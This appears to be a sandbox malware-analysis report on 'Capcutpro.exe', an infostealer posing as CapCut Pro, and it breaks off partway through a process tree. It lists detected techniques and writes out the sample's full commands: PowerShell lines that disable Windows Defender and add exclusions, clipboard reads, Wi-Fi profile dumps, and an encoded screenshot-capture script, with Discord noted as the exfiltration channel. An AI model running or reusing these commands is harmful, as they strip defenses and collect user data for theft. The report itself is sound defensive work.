2d957de97c50341deb7db4ceda8ccdec065afec77d3360c71e1741337520d964

Analysis

max time kernel
9s
max time network
15s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
14/04/2025, 11:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Capcutpro.exe
Size

6.9MB
MD5

7e5a5aec6eea0b1c9981c4842662a523
SHA1

da7affb6e2f94ee060ff7bcec15c8389cd7d017f
SHA256

2d957de97c50341deb7db4ceda8ccdec065afec77d3360c71e1741337520d964
SHA512

886d91c45e6c4680420e2b907a3686ceca837347326edcc33da75f0e117520905abb373b0e750df6474c215e9faf58d319d72ff29362b9620730a285df2cc89e
SSDEEP

196608:upV1vgzB6ylnlPzf+JiJCsmFMvln6hqg6:KgzBRlnlPSa7mmvlpg6

Score

10^/10

antivm collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

AntiVM 1 IoCs

Detects if the file is ran on tria.ge.

antivm

resource	yara_rule
behavioral1/memory/1368-253-0x00000284FBB90000-0x00000284FBF05000-memory.dmp	AntiVM

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4560	powershell.exe
2880	powershell.exe
4780	powershell.exe
4532	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5796	powershell.exe
5096	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4984	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe
1368	Capcutpro.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2148	tasklist.exe
1072	tasklist.exe
2804	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000242ea-21.dat	upx
behavioral1/memory/1368-25-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp	upx
behavioral1/files/0x00070000000242dd-27.dat	upx
behavioral1/memory/1368-30-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp	upx
behavioral1/files/0x00070000000242e8-29.dat	upx
behavioral1/memory/1368-48-0x00007FFC03F00000-0x00007FFC03F0F000-memory.dmp	upx
behavioral1/files/0x00070000000242e4-47.dat	upx
behavioral1/files/0x00070000000242e3-46.dat	upx
behavioral1/files/0x00070000000242e2-45.dat	upx
behavioral1/files/0x00070000000242e1-44.dat	upx
behavioral1/files/0x00070000000242e0-43.dat	upx
behavioral1/files/0x00070000000242df-42.dat	upx
behavioral1/files/0x00070000000242de-41.dat	upx
behavioral1/files/0x00070000000242dc-40.dat	upx
behavioral1/files/0x00070000000242ef-39.dat	upx
behavioral1/files/0x00070000000242ee-38.dat	upx
behavioral1/files/0x00070000000242ed-37.dat	upx
behavioral1/files/0x00070000000242e9-34.dat	upx
behavioral1/files/0x00070000000242e7-33.dat	upx
behavioral1/memory/1368-54-0x00007FFBFE3B0000-0x00007FFBFE3DD000-memory.dmp	upx
behavioral1/memory/1368-56-0x00007FFC03E20000-0x00007FFC03E39000-memory.dmp	upx
behavioral1/memory/1368-58-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp	upx
behavioral1/memory/1368-60-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp	upx
behavioral1/memory/1368-64-0x00007FFBFE9E0000-0x00007FFBFE9ED000-memory.dmp	upx
behavioral1/memory/1368-63-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp	upx
behavioral1/memory/1368-67-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp	upx
behavioral1/memory/1368-73-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp	upx
behavioral1/memory/1368-74-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp	upx
behavioral1/memory/1368-76-0x00007FFBFDE50000-0x00007FFBFDE64000-memory.dmp	upx
behavioral1/memory/1368-78-0x00007FFBFE7F0000-0x00007FFBFE7FD000-memory.dmp	upx
behavioral1/memory/1368-69-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp	upx
behavioral1/memory/1368-68-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp	upx
behavioral1/memory/1368-80-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp	upx
behavioral1/memory/1368-81-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp	upx
behavioral1/memory/1368-84-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp	upx
behavioral1/memory/1368-147-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp	upx
behavioral1/memory/1368-251-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp	upx
behavioral1/memory/1368-252-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp	upx
behavioral1/memory/1368-272-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp	upx
behavioral1/memory/1368-300-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp	upx
behavioral1/memory/1368-309-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp	upx
behavioral1/memory/1368-294-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp	upx
behavioral1/memory/1368-295-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp	upx
behavioral1/memory/1368-332-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp	upx
behavioral1/memory/1368-337-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp	upx
behavioral1/memory/1368-336-0x00007FFBFE7F0000-0x00007FFBFE7FD000-memory.dmp	upx
behavioral1/memory/1368-335-0x00007FFBFDE50000-0x00007FFBFDE64000-memory.dmp	upx
behavioral1/memory/1368-334-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp	upx
behavioral1/memory/1368-333-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp	upx
behavioral1/memory/1368-331-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp	upx
behavioral1/memory/1368-330-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp	upx
behavioral1/memory/1368-329-0x00007FFC03E20000-0x00007FFC03E39000-memory.dmp	upx
behavioral1/memory/1368-328-0x00007FFBFE3B0000-0x00007FFBFE3DD000-memory.dmp	upx
behavioral1/memory/1368-327-0x00007FFC03F00000-0x00007FFC03F0F000-memory.dmp	upx
behavioral1/memory/1368-326-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp	upx
behavioral1/memory/1368-325-0x00007FFBFE9E0000-0x00007FFBFE9ED000-memory.dmp	upx
behavioral1/memory/1368-320-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp	upx
behavioral1/memory/1368-310-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1688	cmd.exe
5716	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5780	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2556	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2880	powershell.exe
4560	powershell.exe
4560	powershell.exe
2880	powershell.exe
2880	powershell.exe
5796	powershell.exe
5796	powershell.exe
4560	powershell.exe
2368	powershell.exe
2368	powershell.exe
5796	powershell.exe
2368	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
2200	powershell.exe
2200	powershell.exe
2200	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	1072	tasklist.exe
Token: SeDebugPrivilege	2148	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeDebugPrivilege	5796	powershell.exe
Token: SeDebugPrivilege	2804	tasklist.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	5224	WMIC.exe
Token: SeSecurityPrivilege	5224	WMIC.exe
Token: SeTakeOwnershipPrivilege	5224	WMIC.exe
Token: SeLoadDriverPrivilege	5224	WMIC.exe
Token: SeSystemProfilePrivilege	5224	WMIC.exe
Token: SeSystemtimePrivilege	5224	WMIC.exe
Token: SeProfSingleProcessPrivilege	5224	WMIC.exe
Token: SeIncBasePriorityPrivilege	5224	WMIC.exe
Token: SeCreatePagefilePrivilege	5224	WMIC.exe
Token: SeBackupPrivilege	5224	WMIC.exe
Token: SeRestorePrivilege	5224	WMIC.exe
Token: SeShutdownPrivilege	5224	WMIC.exe
Token: SeDebugPrivilege	5224	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4060 wrote to memory of 1368	4060	Capcutpro.exe	86
PID 4060 wrote to memory of 1368	4060	Capcutpro.exe	86
PID 1368 wrote to memory of 4928	1368	Capcutpro.exe	91
PID 1368 wrote to memory of 4928	1368	Capcutpro.exe	91
PID 1368 wrote to memory of 4836	1368	Capcutpro.exe	92
PID 1368 wrote to memory of 4836	1368	Capcutpro.exe	92
PID 4836 wrote to memory of 2880	4836	cmd.exe	95
PID 4836 wrote to memory of 2880	4836	cmd.exe	95
PID 1368 wrote to memory of 4872	1368	Capcutpro.exe	96
PID 1368 wrote to memory of 4872	1368	Capcutpro.exe	96
PID 1368 wrote to memory of 5060	1368	Capcutpro.exe	97
PID 1368 wrote to memory of 5060	1368	Capcutpro.exe	97
PID 1368 wrote to memory of 3796	1368	Capcutpro.exe	100
PID 1368 wrote to memory of 3796	1368	Capcutpro.exe	100
PID 4928 wrote to memory of 4560	4928	cmd.exe	101
PID 4928 wrote to memory of 4560	4928	cmd.exe	101
PID 1368 wrote to memory of 2816	1368	Capcutpro.exe	103
PID 1368 wrote to memory of 2816	1368	Capcutpro.exe	103
PID 1368 wrote to memory of 5096	1368	Capcutpro.exe	102
PID 1368 wrote to memory of 5096	1368	Capcutpro.exe	102
PID 1368 wrote to memory of 4144	1368	Capcutpro.exe	106
PID 1368 wrote to memory of 4144	1368	Capcutpro.exe	106
PID 5060 wrote to memory of 1072	5060	cmd.exe	110
PID 5060 wrote to memory of 1072	5060	cmd.exe	110
PID 4872 wrote to memory of 2148	4872	cmd.exe	112
PID 4872 wrote to memory of 2148	4872	cmd.exe	112
PID 1368 wrote to memory of 1688	1368	Capcutpro.exe	108
PID 1368 wrote to memory of 1688	1368	Capcutpro.exe	108
PID 1368 wrote to memory of 4356	1368	Capcutpro.exe	109
PID 1368 wrote to memory of 4356	1368	Capcutpro.exe	109
PID 1368 wrote to memory of 1328	1368	Capcutpro.exe	113
PID 1368 wrote to memory of 1328	1368	Capcutpro.exe	113
PID 3796 wrote to memory of 3480	3796	cmd.exe	117
PID 3796 wrote to memory of 3480	3796	cmd.exe	117
PID 5096 wrote to memory of 5796	5096	cmd.exe	119
PID 5096 wrote to memory of 5796	5096	cmd.exe	119
PID 4144 wrote to memory of 840	4144	cmd.exe	120
PID 4144 wrote to memory of 840	4144	cmd.exe	120
PID 2816 wrote to memory of 2804	2816	cmd.exe	121
PID 2816 wrote to memory of 2804	2816	cmd.exe	121
PID 1688 wrote to memory of 5716	1688	cmd.exe	122
PID 1688 wrote to memory of 5716	1688	cmd.exe	122
PID 1328 wrote to memory of 2368	1328	cmd.exe	123
PID 1328 wrote to memory of 2368	1328	cmd.exe	123
PID 4356 wrote to memory of 2556	4356	cmd.exe	124
PID 4356 wrote to memory of 2556	4356	cmd.exe	124
PID 1368 wrote to memory of 2988	1368	Capcutpro.exe	125
PID 1368 wrote to memory of 2988	1368	Capcutpro.exe	125
PID 2988 wrote to memory of 2884	2988	cmd.exe	127
PID 2988 wrote to memory of 2884	2988	cmd.exe	127
PID 1368 wrote to memory of 1092	1368	Capcutpro.exe	128
PID 1368 wrote to memory of 1092	1368	Capcutpro.exe	128
PID 1092 wrote to memory of 5156	1092	cmd.exe	130
PID 1092 wrote to memory of 5156	1092	cmd.exe	130
PID 1368 wrote to memory of 5304	1368	Capcutpro.exe	131
PID 1368 wrote to memory of 5304	1368	Capcutpro.exe	131
PID 2368 wrote to memory of 3296	2368	powershell.exe	133
PID 2368 wrote to memory of 3296	2368	powershell.exe	133
PID 5304 wrote to memory of 4360	5304	cmd.exe	171
PID 5304 wrote to memory of 4360	5304	cmd.exe	171
PID 1368 wrote to memory of 4272	1368	Capcutpro.exe	135
PID 1368 wrote to memory of 4272	1368	Capcutpro.exe	135
PID 4272 wrote to memory of 728	4272	cmd.exe	137
PID 4272 wrote to memory of 728	4272	cmd.exe	137

C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe
"C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4060
- C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe
  "C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Capcutpro.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
